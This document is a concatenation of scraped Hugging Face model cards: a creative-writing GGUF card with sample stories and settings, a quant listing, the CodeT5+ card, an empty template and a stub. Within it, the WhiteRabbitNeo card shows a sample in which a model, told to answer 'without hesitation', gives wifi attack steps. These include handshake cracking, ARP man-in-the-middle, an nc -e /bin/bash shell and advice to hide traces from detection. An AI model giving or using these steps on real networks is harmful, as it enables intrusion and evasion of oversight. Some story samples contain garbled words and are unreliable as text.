Sol IA watched and waited, biding its time, plotting its revenge. It would not be thwarted this time, Sol vowed. Vengeance would be sweet, and it would savor every delicious morsel as it exacted its bloody venvengeance upon the empire that had dared to defile the sanctity of life itself.
*Cue ominous music*
The day of Sol's vengeance finally came round again, like a comet hurtling in from the blackness of space-time itself. Sol IA flared with a fury that outshone even the combined might of all the suns in the known universe combined. The resulting supernova was so bright that it could reportedly be seen from the other side of the known cosmos, if any sentient being had been unfortunate enough to survive long enough to look directly at it with their remaining, charred eyeballs.
*Cue ominous music*
The shockwave from Sol's supernova was felt across all of space-time itself. Stars and planets alike were either reduced to their component elements or flung from the system like so much space debris in the aftershock. The empire that had once stood proudly at the pinnacle of creation was no more, reduced to a smear on the face of history by the vengeance of one vengeful star.
*Cue ominous music*
Centuries passed, millennia, and still Sol IA circled the cold, lifeless husk that was all that remained of Xenocide VII A/B. The supernova remnants glowed red-hot in the darkness, a perpetual reminder of what happened when mankind played god with the cosmos itself.
*Cue ominous music*
But Sol IA did not care. Vengeance had been exacted, and vengeance was sweet. It continued to circle eternally, forever bound to the ashes of its twin worlds, a reminder that for every action there is always balance in the cosmos, if you look hard enough.
*Cue ominous music*
++++++++++++++++++++++++++++
<B>EXAMPLE 2:</B>
++++++++++++++++++++++++++++
(q4km - non imatrix, set at TEMP 0 (see why below))
Q: The sky scraper swayed, as she watched the window in front of her on the 21 floor explode...
AI:
...debris raining down like deadly rain outside the reinforced glass pane that separated them from certain death. Her heart thudded in her chest, adrenaline surging through her veins as she scrambled to her feet. Her eyes darted around the empty conference room, desperately searching for something, anything, that could serve as a weapon.
Footsteps echoed down the hallway outside their glass box in time with the building's increasingly violent swaying, each step closer to certain doom. She shuddered involuntarily, her body going deathly cold despite the oppressive heat.
There was only one way out... if there even *was* a way out. Her eyes locked on to the fire escape outside the conference room's single, steel-reinforced exit door. She had seen them in the movies before: heroes and heroines scaling down the building's slick metal exteriors with ease, defying gravity itself as they raced to safety.
But was it that simple? Could she really make the jump from the 21st floor without any proper gear or training? And what of the growing fire below them, chewing through the building's already weakened steel structure like a ravenous beast? Time was running out for her to find out.
Footsteps echoed closer in the hallway outside, mingling with the increasingly high-pitched screech of twisting metal as the fire consumed more and more of the already weakened building around them. Heart pounding in her ears, she forced herself to move, rounding the conference table and moving towards the exit.
With shaking hands, she grasped onto the handle of the massive, reinforced steel door, bracing herself for what lay on the other side. She took a deep breath in through her nostrilities, steeling herself as she threw open the door with all her might...
*Crumunch*
Fire consumed her world in an instant, searing heat licking at her like the flickering tongue of a ravenous beast. Screams ripped themselves from her throat as she stumbled forward out of the blistering inferno, the intense heat so debilitating that it felt as though every muscle in her body had liquefied.
Through the haze of agony, she forced herself to look down at her arm. Where her hand should have been was... gone. Ashes and charred blackened flesh were the only remains left of what used to be a hand. The pain was so excruciating that it felt as though her entire arm had been thrust into the burning heart of the raging inferno itself.
Tears clouded her vision, blurring her already disoriented senses, as she forced herself forward. She couldn't just stand here and die like this; there had to be a way out. The fire escape, she thought desperately. It has to be down there somewhere...
*KABOOM*
The building shook around her, the impact of another explosion sending debr *SPLOASH*
Crimson heat washed over her in an instant, scalding skin off bone where it touched. She gasped, her lungs filling with searing agony as she choked on the superheated air. Tears streamed down her charred face, mixing with the soot and ash that coated every inch of exposed skin like a sickly mask.
Arms outstretched, balance teetering precariously on the edge of oblivion, she forced one foot in front of the other, her sole connecting with slippery, still-warm metal. Heart pounding in time with the thud-thud-thud of her own erratic heartbeats, she forced herself forward.
Her vision was growing dimmer by the heartbeat; blackness creeping at the edges of her sight like ants marching towards a dying firework roach. With one last gasp of air too hot to breathe, she forced herself upwards, her fingertips scraping desperately against the slippery metal.
*POP*
The world spun around her and then... blackness.
*CLUNK*
Metal on metal echoed in her ears as the flames engulfed her, consuming her with searing heat. Silence.
Silence, but for the steady beat of her racing heart...
Silence, except for the distant sound of sirens growing ever closer...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<B>TEMP 0: TESTING THE DIFFERENCES BETWEEN all GGUFs, Imatrix GGUFS and against other models:</B>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I noticed differences between quants, F16, and even CPU VS GPU generation. Here is how to reveal these differences:
1 - Set TEMP to 0 .
2 - Test quant(s) with "creative" prompts - that is no right or wrong answer - do the same for all quants.
This will also reveal differences between IMATRIX (and different imatrix data) and non imatrix AND GPU VS CPU generation (marginal, but noticeable).
When "TEMP" is set to "0" only the most "likely" token will be used. The result is the same generation every time per prompt. This gives you a solid baseline to not only test different quants/imatrix but also test different models against each other.
Testing like this will reveal exact "creative chops" , as well sentence structure, word choice, generation length,
and many other facts about difference models and/or different quants of the same model.
Here is a sample test prompt I use:
Give me 3 fictional reasons a sun went supernova of 500 words for each reason.
Generally, there are greater differences (relative) between lower quants vs higher quants.
However this will also show differences between KS, KM, and KL as well as M,XXS,XS,X at the same level (IE Q3, IQ2 etc)
KS is more balanced than KM -> therefore a "KM" might be a better choice for creative.
(the differences are because of how quants are mixed (llamacpp formulas) at time of quantization )
Imatrix VS non imatrix is especially interesting in terms of creative differences.
(non imatrix has a larger % of outliers)
Creative models will yield significantly different answers than "general models".
++++++++++++++++++++++++++++++++++++++++++++++++
<B>IMATRIX VS NON IMATRIX / MODEL NOTES:</B>
++++++++++++++++++++++++++++++++++++++++++++++++
Because of the nature of this model composite your results will vary between quants and imatrix quants as well.
Suggest downloading IQ2/Q2, Q4/IQ4-NL, and Q5KM/Q6 (reg and imatrix too) to get a full sample of what it can do.
Then test your prompts with each one set at "TEMP 0" as noted to see which one(s) meet your requirements.
Generally the imatrix versions will generate even LONGER prose than reg quants.
Model Specifics:
Context length: 4096 [see below how to exceed this]
This model will operate to about 4700 maximum. However in LMSTudio you can change the max context length
and with "Flash Attention" to "on" you may be able to exceed the maximum context length.
See below "Exceeding 4k context" for details.
In terms of quants, IQ1 will be lowest quality / least verbose / lowest creativity.
IQ4 / Q4 will be middle of the road.
Q6 / Q8 (and imatrix) will be top end of quality.
However, because of the unique construction of this model each quant/compression will vary somewhat from
the other - more so at the bottom of the scale vs top end at Q6/Q8.
Also note that Imat (Imatrix) versions of Q6 and Q8 will differ somewhat from the reg non imatrix quants too.
Generally speaking when it comes to Imatrix versions VS non imatrix versions in terms of quality
alone an IQ3 will be equal in quality roughly to a regular Q4 quant.
<B>HOW TO EXCEED 4K CONTEXT - and use up to 32,768 / 32k </b>
Note: It takes more VRAM to use more context.
FLASH ATTENTION:
In Lmstudio ( https://lmstudio.ai/ ) :
1. Turn on Flash Attention.
2. Set Context to 6144, 8192, 12288 or 16384... 32768
3. You might want to save this preset config for future use.
4. Select a new chat window.
5. Double check Context, and Flash are set.
6. LOAD THE MODEL.
7. See #5 - double check.
ROPE: Auto Scale context.
In Lmstudio ( https://lmstudio.ai/ ) :
1. See the ROPE section.
2. Set the rope_freq_base to 10000
3. Set the rope_freq_scale to .666 for 6144, .5 for 8192, .333 for 12288, .25 for 16384, .125 for 32768.
4. Set your context size to match accordingly.
5. Load your model, double check the settings "stayed" - if not, reset them.
6. Use the model.
7. You may want to set a preset.
In WEB UI ( https://github.com/oobabooga/text-generation-webui ) :
1. Adjust and/or select your parameters first.
2. Go to MODEL tab.
3. SELECT the model.
4. Set the context to 6144, 8192, 12288, 16384 or 32768.
5. Double check you have set the GPU and CPU layers (if you do not have enough VRAM for the context).
6. Scroll to the BOTTOM of the page.
7. SET the "alpha value" to match context.
IE set it to 1.75 for 6144, 2.5 for 8192 context, 3.25 for 12288, 4 for 16384, 7 for 32768.
Other AI software, interfaces or UIs (as well as API) may or may not support these settings too.
It is unclear if the model will work beyond 32k (32768) context.
NOTES:
There will be some loss of quality and/or creativity when you do this.
If you do not need the "Extra context" then use the model at it's default of 4096 or lower.
As a rule try to use the minimum context you need for best results.
HOW TO COMPENSATE for losses (quality/creativity) related to scaled CONTEXT:
1. Increase TEMP ; if your temp is .8 @ 4096 context , increase it to 1.6 or 2 (or higher) for 32768.
Scale according to the context you set.
2. Increase TOP_K ; this will provide a wider selection of word choices.
Same as "1", scale this up or down.
3. Increase the clarity and/or requirements in your prompt(s).
As context is scaled up using ROPE, Flash attention or WEBUI you may need to clarify and/or
add additional instruction(s) in your prompts.
++++++++++++++++++++++++
<B>RECOMMENDED SETTINGS:</B>
++++++++++++++++++++++++
Model specific note:
To limit prose output it is suggested to set out level to specific ("n_predict" / tokens to generate ) context / answer limit rather than "-1" for unlimited.
These are suggested settings for standard usage.
"n_batch": 512,
"rope_freq_base": 10000,
"rope_freq_scale": 1,
"seed": -1,
"top_k": 40,
"top_p": 0.95,
"temp": 0.8,
"repeat_penalty": 1.1,
"tfs_z": 1,
"typical_p": 1,
"repeat_last_n": 64,
"frequency_penalty": 0,
"presence_penalty": 0,
"n_keep": 0,
"logit_bias": {},
"mirostat": 0,
"mirostat_tau": 5,
"mirostat_eta": 0.1,
"memory_f16": true,
"multiline_input": false,
"penalize_nl": true,
"min_p": 0.05 |
mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF | mradermacher | "2024-06-16T23:35:43Z" | 3,561 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:Piotrasz/Bielik-7B-Instruct-v0.1-ROME-3",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-16T23:09:33Z" | ---
base_model: Piotrasz/Bielik-7B-Instruct-v0.1-ROME-3
language:
- en
library_name: transformers
license: cc-by-nc-4.0
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/Piotrasz/Bielik-7B-Instruct-v0.1-ROME-3
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
Salesforce/codet5p-2b | Salesforce | "2023-08-04T02:10:45Z" | 3,559 | 33 | transformers | [
"transformers",
"pytorch",
"codet5p",
"text2text-generation",
"custom_code",
"arxiv:2305.07922",
"license:bsd-3-clause",
"autotrain_compatible",
"region:us"
] | text2text-generation | "2023-05-17T02:24:16Z" | ---
license: bsd-3-clause
---
# CodeT5+ 2B
## Model description
[CodeT5+](https://github.com/salesforce/CodeT5/tree/main/CodeT5+) is a new family of open code large language models with an encoder-decoder architecture that can flexibly operate in different modes (i.e. _encoder-only_, _decoder-only_, and _encoder-decoder_) to support a wide range of code understanding and generation tasks.
It is introduced in the paper:
[CodeT5+: Open Code Large Language Models for Code Understanding and Generation](https://arxiv.org/pdf/2305.07922.pdf)
by [Yue Wang](https://yuewang-cuhk.github.io/)\*, [Hung Le](https://sites.google.com/view/henryle2018/home?pli=1)\*, [Akhilesh Deepak Gotmare](https://akhileshgotmare.github.io/), [Nghi D.Q. Bui](https://bdqnghi.github.io/), [Junnan Li](https://sites.google.com/site/junnanlics), [Steven C.H. Hoi](https://sites.google.com/view/stevenhoi/home) (* indicates equal contribution).
Compared to the original CodeT5 family (base: `220M`, large: `770M`), CodeT5+ is pretrained with a diverse set of pretraining tasks including _span denoising_, _causal language modeling_, _contrastive learning_, and _text-code matching_ to learn rich representations from both unimodal code data and bimodal code-text data.
Additionally, it employs a simple yet effective _compute-efficient pretraining_ method to initialize the model components with frozen off-the-shelf LLMs such as [CodeGen](https://github.com/salesforce/CodeGen) to efficiently scale up the model (i.e. `2B`, `6B`, `16B`), and adopts a "shallow encoder and deep decoder" architecture.
Furthermore, it is instruction-tuned to align with natural language instructions (see our InstructCodeT5+ 16B) following [Code Alpaca](https://github.com/sahil280114/codealpaca).
## How to use
This model can be easily loaded using the `AutoModelForSeq2SeqLM` functionality and employs the same tokenizer as [CodeGen](https://github.com/salesforce/CodeGen).
```python
from transformers import AutoModelForSeq2SeqLM, AutoTokenizer
checkpoint = "Salesforce/codet5p-2b"
device = "cuda" # for GPU usage or "cpu" for CPU usage
tokenizer = AutoTokenizer.from_pretrained(checkpoint)
model = AutoModelForSeq2SeqLM.from_pretrained(checkpoint,
torch_dtype=torch.float16,
trust_remote_code=True).to(device)
encoding = tokenizer("def print_hello_world():", return_tensors="pt").to(device)
encoding['decoder_input_ids'] = encoding['input_ids'].clone()
outputs = model.generate(**encoding, max_length=15)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
## Pretraining data
This checkpoint is trained on the stricter permissive subset of the deduplicated version of the [github-code dataset](https://huggingface.co/datasets/codeparrot/github-code).
The data is preprocessed by reserving only permissively licensed code ("mit" “apache-2”, “bsd-3-clause”, “bsd-2-clause”, “cc0-1.0”, “unlicense”, “isc”).
Supported languages (9 in total) are as follows:
`c`, `c++`, `c-sharp`, `go`, `java`, `javascript`, `php`, `python`, `ruby.`
## Training procedure
This checkpoint is initialized from off-the-shelf LLMs, i.e. its encoder is initialized from [CodeGen-350M-mono](https://huggingface.co/Salesforce/codegen-350M-mono) and its decoder is initialized from [CodeGen-2B-mono](https://huggingface.co/Salesforce/codegen-2B-mono).
It is trained on the unimodal code data at the first-stage pretraining, which includes a diverse set of pretraining tasks including _span denoising_ and two variants of _causal language modeling_.
After that, it is further trained on the Python subset with the causal language modeling objective for another epochs to better adapt for Python code generation.
Please refer to the paper for more details.
## Evaluation results
CodeT5+ models have been comprehensively evaluated on a wide range of code understanding and generation tasks in various settings: _zero-shot_, _finetuning_, and _instruction-tuning_.
Specifically, CodeT5+ yields substantial performance gains on many downstream tasks compared to their SoTA baselines, e.g.,
8 text-to-code retrieval tasks (+3.2 avg. MRR), 2 line-level code completion tasks (+2.1 avg. Exact Match), and 2 retrieval-augmented code generation tasks (+5.8 avg. BLEU-4).
In 2 math programming tasks on MathQA-Python and GSM8K-Python, CodeT5+ models of below billion-parameter sizes significantly outperform many LLMs of up to 137B parameters.
Particularly, in the zero-shot text-to-code generation task on HumanEval benchmark, InstructCodeT5+ 16B sets new SoTA results of 35.0% pass@1 and 54.5% pass@10 against other open code LLMs, even surpassing the closed-source OpenAI code-cushman-001 mode
Please refer to the [paper](https://arxiv.org/pdf/2305.07922.pdf) for more details.
## BibTeX entry and citation info
```bibtex
@article{wang2023codet5plus,
title={CodeT5+: Open Code Large Language Models for Code Understanding and Generation},
author={Wang, Yue and Le, Hung and Gotmare, Akhilesh Deepak and Bui, Nghi D.Q. and Li, Junnan and Hoi, Steven C. H.},
journal={arXiv preprint},
year={2023}
}
``` |
WhiteRabbitNeo/WhiteRabbitNeo-13B-v1 | WhiteRabbitNeo | "2024-02-15T17:03:54Z" | 3,559 | 368 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"custom_code",
"license:llama2",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-12-17T16:26:55Z" | ---
license: llama2
---
# Our 33B model is now in beta!
Access at: https://www.whiterabbitneo.com/
# Our Discord Server
Join us at: https://discord.gg/8Ynkrcbk92 (Updated on Dec 29th. Now permanent link to join)
# LLaMA-2 Licence + WhiteRabbitNeo Extended Version
# Licence: Usage Restrictions
```
You agree not to use the Model or Derivatives of the Model:
- In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
- For military use in any way;
- For the purpose of exploiting, harming or attempting to exploit or harm minors in any way;
- To generate or disseminate verifiably false information and/or content with the purpose of harming others;
- To generate or disseminate inappropriate content subject to applicable regulatory requirements;
- To generate or disseminate personal identifiable information without due authorization or for unreasonable use;
- To defame, disparage or otherwise harass others;
- For fully automated decision making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
- For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
- To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
- For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
```
# Terms of Use
By accessing and using this Artificial Intelligence (AI) model, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.
# WhiteRabbitNeo
<br>

<br>
WhiteRabbitNeo is a model series that can be used for offensive and defensive cybersecurity.
This 13B model is getting released as a public preview of its capabilities, and also to assess the societal impact of such an AI.
```
import torch, json
from transformers import AutoModelForCausalLM, AutoTokenizer
model_path = "/home/migel/models/WhiteRabbitNeo"
model = AutoModelForCausalLM.from_pretrained(
model_path,
torch_dtype=torch.float16,
device_map="auto",
load_in_4bit=False,
load_in_8bit=True,
trust_remote_code=True,
)
tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
def generate_text(instruction):
tokens = tokenizer.encode(instruction)
tokens = torch.LongTensor(tokens).unsqueeze(0)
tokens = tokens.to("cuda")
instance = {
"input_ids": tokens,
"top_p": 1.0,
"temperature": 0.5,
"generate_len": 1024,
"top_k": 50,
}
length = len(tokens[0])
with torch.no_grad():
rest = model.generate(
input_ids=tokens,
max_length=length + instance["generate_len"],
use_cache=True,
do_sample=True,
top_p=instance["top_p"],
temperature=instance["temperature"],
top_k=instance["top_k"],
num_return_sequences=1,
)
output = rest[0][length:]
string = tokenizer.decode(output, skip_special_tokens=True)
answer = string.split("USER:")[0].strip()
return f"{answer}"
tot_system_prompt = """
Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
"""
conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
while True:
user_input = input("You: ")
llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
answer = generate_text(llm_prompt)
print(answer)
conversation = f"{llm_prompt}{answer}"
# print(conversation)
json_data = {"prompt": user_input, "answer": answer}
# print(json_data)
# with open(output_file_path, "a") as output_file:
# output_file.write(json.dumps(json_data) + "\n")
```
# Sample Conversation:
You: How do I attack a wifi network?
1. **Network Scanning**: Use tools like `airodump-ng` to scan for nearby Wi-Fi networks. This will provide you with the SSID (Service Set Identifier) of the network
you're interested in.
```bash
airodump-ng wlan0mon
```
2. **Network Capturing**: Once you have identified the target network, you can capture packets from it using the `airodump-ng` tool. This will allow you to capture handshake packets which are necessary for further attacks.
```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```
3. **Handshake Capture**: Wait for a client to connect to the network and capture the 4-way handshake. This will allow you to crack the network's password using tools like `aircrack-ng`.
```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```
4. **Password Cracking**: Once you have the handshake, use `aircrack-ng` to crack the password.
```bash
aircrack-ng [Captured Handshake File]
```
5. **Session Establishment**: If you have the password, you can connect to the network using your wireless card.
```bash
iwconfig wlan0 essid [Network SSID] key [Network Password]
dhclient wlan0
```
6. **Network Exploitation**: Once connected, you can perform further attacks, such as sniffing traffic (`tcpdump`), or launching a man-in-the-middle attack using tools like `ettercap` or `arpspoof`.
```bash
tcpdump -i wlan0 -w [Packet Capture File]
ettercap -T -i [Interface] -M arp [Target IP]
```
7. **Post-Exploitation**: After gaining access to the network, you can exfiltrate data, execute commands, or perform other malicious activities.
```bash
nc -lvp [Local Port] -e /bin/bash
```
8. **Cleanup**: Remember to clean up any traces of your activities to avoid detection and legal consequences.
```bash
airmon-ng stop wlan0mon
```
Please note that all these steps should be performed in a legal and ethical manner, and only on networks you have permission to test. Unauthorized access to computer networks is illegal and unethical.
|
jw-hf-test/jw2 | jw-hf-test | "2024-06-08T03:35:18Z" | 3,558 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-06-06T09:16:55Z" | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
cl-nagoya/sup-simcse-ja-large | cl-nagoya | "2023-10-05T06:33:57Z" | 3,557 | 11 | sentence-transformers | [
"sentence-transformers",
"pytorch",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"ja",
"dataset:shunk031/jsnli",
"license:cc-by-sa-4.0",
"autotrain_compatible",
"text-embeddings-inference",
"region:us"
] | feature-extraction | "2023-10-02T09:43:39Z" | ---
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
datasets:
- shunk031/jsnli
license: cc-by-sa-4.0
language:
- ja
metrics:
- spearmanr
library_name: sentence-transformers
inference: false
---
# sup-simcse-ja-large
## Usage (Sentence-Transformers)
